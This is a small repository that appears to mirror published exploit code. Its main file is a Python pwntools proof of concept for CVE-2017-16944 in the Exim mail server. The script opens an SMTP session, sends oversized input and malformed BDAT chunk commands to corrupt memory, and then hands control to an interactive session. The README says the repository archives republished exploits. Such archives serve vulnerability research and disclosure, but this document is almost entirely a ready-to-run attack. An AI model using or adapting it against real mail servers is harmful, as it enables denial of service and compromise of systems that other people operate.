├── CVE-2017-16944
    └── poc.py
└── README.md


/CVE-2017-16944/poc.py:
--------------------------------------------------------------------------------
 1 | # ARCHIVE FROM https://bugs.exim.org/attachment.cgi?id=1052 
 2 | # Conversation
 3 | # https://bugs.exim.org/show_bug.cgi?id=2199
 4 | # https://bugs.exim.org/show_bug.cgi?id=2201
 5 | #
 6 | # 
 7 | # CVE-2017-16944 (Associated: CVE-2017-16943)
 8 | #
 9 | 
10 | # pip install pwntools
11 | from pwn import *
12 | 
13 | r = remote('localhost', 25)
14 | 
15 | r.recvline()
16 | r.sendline("EHLO test")
17 | r.recvuntil("250 HELP")
18 | r.sendline("MAIL FROM:<test@localhost>")
19 | r.recvline()
20 | r.sendline("RCPT TO:<test@localhost>")
21 | r.recvline()
22 | #raw_input()
23 | r.sendline('a'*0x1100+'\x7f')
24 | #raw_input()
25 | r.recvuntil('command')
26 | r.sendline('BDAT 1')
27 | r.sendline(':BDAT \x7f')
28 | s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
29 | r.send(s+ ':\r\n')
30 | r.recvuntil('command')
31 | #raw_input()
32 | r.send('\n')
33 | r.interactive()
34 | exit()
35 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # PoC-Exploit-Mirror
2 | Archive Mirror for recently republished PoC/Exploit code. 
3 | 
4 | Purpose of this mirror is to provide an ad-hoc bridge between mailing groups and exploit archive publishing. You can probably ignore it.
5 | 


--------------------------------------------------------------------------------